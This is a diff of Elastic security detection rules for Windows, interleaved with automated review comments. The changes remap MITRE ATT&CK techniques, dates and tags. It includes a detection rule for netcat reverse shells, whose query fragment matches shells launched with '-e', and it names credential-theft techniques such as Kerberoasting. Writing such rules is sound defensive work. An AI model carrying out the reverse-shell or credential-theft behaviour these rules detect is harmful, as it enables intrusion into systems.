diff --git a/rules/windows/execution_initial_access_foxmail_exploit.toml b/rules/windows/execution_initial_access_foxmail_exploit.toml
index 1724e0f677c..9b47d891bbf 100644
--- a/rules/windows/execution_initial_access_foxmail_exploit.toml
+++ b/rules/windows/execution_initial_access_foxmail_exploit.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/08/29"
 integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -90,26 +90,31 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1203"
 name = "Exploitation for Client Execution"
 reference = "https://attack.mitre.org/techniques/T1203/"
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1189"
-name = "Drive-by Compromise"
-reference = "https://attack.mitre.org/techniques/T1189/"
+id = "T1566"
+name = "Phishing"
+reference = "https://attack.mitre.org/techniques/T1566/"
+[[rule.threat.technique.subtechnique]]
+id = "T1566.001"
+name = "Spearphishing Attachment"
+reference = "https://attack.mitre.org/techniques/T1566/001/"
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-
diff --git a/rules/windows/execution_initial_access_via_msc_file.toml b/rules/windows/execution_initial_access_via_msc_file.toml
index b0fc6db6048..580c7458cb8 100644
--- a/rules/windows/execution_initial_access_via_msc_file.toml
+++ b/rules/windows/execution_initial_access_via_msc_file.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/05/12"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/09/11"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -50,19 +50,7 @@ references = ["https://www.genians.co.kr/blog/threat_intelligence/facebook"]
 risk_score = 73
 rule_id = "e760c72b-bb1f-44f0-9f0d-37d51744ee75"
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Tactic: Initial Access",
- "Resources: Investigation Guide",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: Sysmon",
- "Data Source: Microsoft Defender for Endpoint",
- "Data Source: SentinelOne",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -100,41 +88,36 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1218"
+name = "System Binary Proxy Execution"
+reference = "https://attack.mitre.org/techniques/T1218/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1218.014"
+name = "MMC"
+reference = "https://attack.mitre.org/techniques/T1218/014/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1204"
 name = "User Execution"
 reference = "https://attack.mitre.org/techniques/T1204/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1204.002"
 name = "Malicious File"
 reference = "https://attack.mitre.org/techniques/T1204/002/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1566"
-name = "Phishing"
-reference = "https://attack.mitre.org/techniques/T1566/"
-[[rule.threat.technique.subtechnique]]
-id = "T1566.001"
-name = "Spearphishing Attachment"
-reference = "https://attack.mitre.org/techniques/T1566/001/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1566.002"
-name = "Spearphishing Link"
-reference = "https://attack.mitre.org/techniques/T1566/002/"
-
-
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
diff --git a/rules/windows/execution_initial_access_wps_dll_exploit.toml b/rules/windows/execution_initial_access_wps_dll_exploit.toml
index b6d8c918d59..d318934d34c 100644
--- a/rules/windows/execution_initial_access_wps_dll_exploit.toml
+++ b/rules/windows/execution_initial_access_wps_dll_exploit.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/08/29"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -57,16 +57,7 @@ references = [
 risk_score = 73
 rule_id = "ac6bc744-e82b-41ad-b58d-90654fa4ebfb"
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Initial Access",
- "Tactic: Execution",
- "Data Source: Elastic Defend",
- "Data Source: Sysmon",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -88,26 +79,18 @@ any where host.os.type == "windows" and process.name : "promecefpluginhost.exe"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1129"
+name = "Shared Modules"
+reference = "https://attack.mitre.org/techniques/T1129/"
+
 [[rule.threat.technique]]
 id = "T1203"
 name = "Exploitation for Client Execution"
 reference = "https://attack.mitre.org/techniques/T1203/"
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1189"
-name = "Drive-by Compromise"
-reference = "https://attack.mitre.org/techniques/T1189/"
-
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
diff --git a/rules/windows/execution_mofcomp.toml b/rules/windows/execution_mofcomp.toml
index a20ec6e9ab6..1b244d6b497 100644
--- a/rules/windows/execution_mofcomp.toml
+++ b/rules/windows/execution_mofcomp.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/23"
 integration = ["endpoint", "m365_defender", "system", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/02/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -25,18 +25,7 @@ name = "Mofcomp Activity"
 risk_score = 21
 rule_id = "210d4430-b371-470e-b879-80b7182aa75e"
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Data Source: Elastic Defend",
- "Data Source: Microsoft Defender for Endpoint",
- "Data Source: Elastic Endgame",
- "Data Source: Windows Security Event Logs",
- "Data Source: Crowdstrike",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -90,31 +79,31 @@ Mofcomp.exe is a tool used to compile Managed Object Format (MOF) files, which d
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1047"
 name = "Windows Management Instrumentation"
 reference = "https://attack.mitre.org/techniques/T1047/"
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1546"
 name = "Event Triggered Execution"
 reference = "https://attack.mitre.org/techniques/T1546/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1546.003"
 name = "Windows Management Instrumentation Event Subscription"
 reference = "https://attack.mitre.org/techniques/T1546/003/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
diff --git a/rules/windows/execution_ms_office_written_file.toml b/rules/windows/execution_ms_office_written_file.toml
index 979a2d927a3..6f016f0f871 100644
--- a/rules/windows/execution_ms_office_written_file.toml
+++ b/rules/windows/execution_ms_office_written_file.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/09/02"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2024/08/06"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -99,30 +99,22 @@ sequence with maxspan=2h
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1566"
-name = "Phishing"
-reference = "https://attack.mitre.org/techniques/T1566/"
-[[rule.threat.technique.subtechnique]]
-id = "T1566.001"
-name = "Spearphishing Attachment"
-reference = "https://attack.mitre.org/techniques/T1566/001/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1566.002"
-name = "Spearphishing Link"
-reference = "https://attack.mitre.org/techniques/T1566/002/"
+id = "T1203"
+name = "Exploitation for Client Execution"
+reference = "https://attack.mitre.org/techniques/T1203/"
+[[rule.threat.technique]]
+id = "T1204"
+name = "User Execution"
+reference = "https://attack.mitre.org/techniques/T1204/"
+[[rule.threat.technique.subtechnique]]
+id = "T1204.002"
+name = "Malicious File"
+reference = "https://attack.mitre.org/techniques/T1204/002/"
 [rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/windows/execution_posh_hacktool_functions.toml b/rules/windows/execution_posh_hacktool_functions.toml
index 8e6c5f0f7eb..25521e39cf8 100644
--- a/rules/windows/execution_posh_hacktool_functions.toml
+++ b/rules/windows/execution_posh_hacktool_functions.toml
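Review bot: The `@@ -99,30 +99,22 @@` hunk of execution_ms_office_written_file.toml removes the Initial Access `[[rule.threat]]` entry (T1566, T1566.001, T1566.002) and leaves a single Execution entry (T1203, T1204.002), but this rule's `tags` array is not part of the visible diff, whereas every other rule in this change that drops a tactic also rewrites its tags to match (execution_downloaded_shortcut_files.toml, for instance, swaps `Tactic: Execution` for `Tactic: Initial Access`). If the tags still carry `Tactic: Initial Access`, or do not carry `Tactic: Execution`, the tags and the threat tactics are out of step for this rule; worth confirming against the full file before merge. Either way the old first `[[rule.threat]]` entry, which had a tactic but no technique, is gone, so the new layout is an improvement.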
@@ -2,7 +2,7 @@
 creation_date = "2023/01/17"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -102,14 +102,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t
 Setup instructions: https://ela.st/powershell-logging-setup
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Data Source: PowerShell Logs",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Tactic: Discovery", "Tactic: Execution", "Tactic: Exfiltration", "Tactic: Lateral Movement", "Data Source: PowerShell Logs", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -310,22 +303,111 @@ case_insensitive = true
 value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1003"
+name = "OS Credential Dumping"
+reference = "https://attack.mitre.org/techniques/T1003/"
+
+[[rule.threat.technique]]
+id = "T1558"
+name = "Steal or Forge Kerberos Tickets"
+reference = "https://attack.mitre.org/techniques/T1558/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1558.003"
+name = "Kerberoasting"
+reference = "https://attack.mitre.org/techniques/T1558/003/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1055"
+name = "Process Injection"
+reference = "https://attack.mitre.org/techniques/T1055/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1069"
+name = "Permission Groups Discovery"
+reference = "https://attack.mitre.org/techniques/T1069/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1069.002"
+name = "Domain Groups"
+reference = "https://attack.mitre.org/techniques/T1069/002/"
+
+[[rule.threat.technique]]
+id = "T1087"
+name = "Account Discovery"
+reference = "https://attack.mitre.org/techniques/T1087/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1087.002"
+name = "Domain Account"
+reference = "https://attack.mitre.org/techniques/T1087/002/"
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = 
"T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/execution_posh_portable_executable.toml b/rules/windows/execution_posh_portable_executable.toml index 2053274cec8..a2bbc3e2a74 100644 --- a/rules/windows/execution_posh_portable_executable.toml +++ b/rules/windows/execution_posh_portable_executable.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -118,34 +118,34 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/execution_powershell_susp_args_via_winscript.toml b/rules/windows/execution_powershell_susp_args_via_winscript.toml index f5e2c08a17b..aae57571bac 100644 --- a/rules/windows/execution_powershell_susp_args_via_winscript.toml +++ b/rules/windows/execution_powershell_susp_args_via_winscript.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/09" integration = ["windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
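Review bot: Replacing T1055 (Process Injection) with T1027 (Obfuscated Files or Information) under Defense Evasion removes Process Injection from this rule's claimed coverage, which any ATT&CK coverage matrix built from `rule.threat` will show as a lost cell. If the detection still fires on PowerShell loading a PE into process memory, keeping T1055 alongside the added T1027 would describe the behaviour more completely; if the narrowing is intentional, a sentence in the PR description would help the next reviewer. The query and `tags` hunks for this file are outside this chunk, so this is inferred from the rule name only.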
@@ -105,10 +105,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -119,15 +121,7 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/execution_psexec_lateral_movement_command.toml b/rules/windows/execution_psexec_lateral_movement_command.toml index c567451cf8d..fca2338e184 100644 --- a/rules/windows/execution_psexec_lateral_movement_command.toml +++ b/rules/windows/execution_psexec_lateral_movement_command.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -94,41 +94,36 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1569" name = "System Services" reference = "https://attack.mitre.org/techniques/T1569/" + [[rule.threat.technique.subtechnique]] id = "T1569.002" name = "Service Execution" reference = "https://attack.mitre.org/techniques/T1569/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - -[[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/execution_register_server_program_connecting_to_the_internet.toml b/rules/windows/execution_register_server_program_connecting_to_the_internet.toml index d0f7e9bb2f1..24ce6afd747 100644 --- a/rules/windows/execution_register_server_program_connecting_to_the_internet.toml +++ b/rules/windows/execution_register_server_program_connecting_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -109,16 +109,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 21 rule_id = "fb02b8d3-71ee-4af1-bacd-215d23f17efa" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon"] type = "eql" query = ''' @@ -142,16 +133,11 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.009" name = "Regsvcs/Regasm" @@ -162,10 +148,7 @@ id = "T1218.010" name = "Regsvr32" reference = "https://attack.mitre.org/techniques/T1218/010/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/execution_revshell_cmd_via_netcat.toml b/rules/windows/execution_revshell_cmd_via_netcat.toml index 2ca0d6e9e10..1b531f5351e 100644 --- a/rules/windows/execution_revshell_cmd_via_netcat.toml +++ b/rules/windows/execution_revshell_cmd_via_netcat.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/10/14" +updated_date = "2026/03/23" [rule] 
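Review bot: The `tags` array is collapsed from one entry per line onto a single ~200-character line, which turns every future tag edit into a whole-line diff and diverges from the one-tag-per-line, trailing-comma form the removed side shows; the same flattening appears in every other `tags` hunk of this range (netcat revshell, scheduled-task PowerShell source, remote WebDAV, SxS DLL, WMI, PDF reader, CHM, conhost, MMC, cmd-shell args, fake CAPTCHA). If the removed form is what the repository's rule writer emits, the next formatted save will rewrite all of these files again, so either keep the multi-line form or confirm the writer now produces a single line. The tactic change itself is consistent here: `Tactic: Execution` leaves the tags and the technique-less Execution entry leaves `rule.threat` together.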
@@ -52,14 +52,7 @@ Attackers may abuse the NetCat utility to execute commands remotely using the bu risk_score = 73 rule_id = "9c0f61fa-abf4-4b11-8d9d-5978c09182dd" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Defend" -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" @@ -75,10 +68,25 @@ process.name : ("cmd.exe", "powershell.exe") and process.parent.args : "-e" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -89,9 +97,7 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/execution_scheduled_task_powershell_source.toml b/rules/windows/execution_scheduled_task_powershell_source.toml index 67a11ba82f0..bd57bc91060 100644 --- a/rules/windows/execution_scheduled_task_powershell_source.toml +++ b/rules/windows/execution_scheduled_task_powershell_source.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/12/15" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/11/06" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -61,15 +61,7 @@ references = [ risk_score = 47 rule_id = "5cd55388-a19c-47c7-8ec4-f41656c2fded" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -82,29 +74,36 @@ sequence by host.id, process.entity_id with maxspan = 5s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" 
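Review bot: Dropping T1059/T1059.001 (PowerShell) from the Execution entry leaves this rule claiming only T1053.005 for Execution, although the file name (`execution_scheduled_task_powershell_source.toml`) and the `sequence by host.id, process.entity_id` hunk context suggest PowerShell is still the acting process; the query itself is outside this hunk, so this is inferred. If powershell.exe remains the subject of the sequence, keeping `T1059.001` next to T1053.005 preserves that coverage. The new Lateral Movement entry (T1021.003) and the added `Tactic: Lateral Movement` tag are consistent with each other.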
diff --git a/rules/windows/execution_scripting_remote_webdav.toml b/rules/windows/execution_scripting_remote_webdav.toml index bce62a907c5..b8228823b23 100644 --- a/rules/windows/execution_scripting_remote_webdav.toml +++ b/rules/windows/execution_scripting_remote_webdav.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -53,20 +53,7 @@ note = """## Triage and analysis risk_score = 73 rule_id = "ee7726cc-babc-4885-988c-f915173ac0c0" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -80,41 +67,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.002" -name = "SMB/Windows Admin Shares" -reference = "https://attack.mitre.org/techniques/T1021/002/" - - -[[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/execution_scripts_archive_file.toml b/rules/windows/execution_scripts_archive_file.toml index 8bc7d0e44cc..c03b2b0d9f8 100644 --- a/rules/windows/execution_scripts_archive_file.toml +++ b/rules/windows/execution_scripts_archive_file.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/20" +updated_date = "2026/03/23" [rule] 
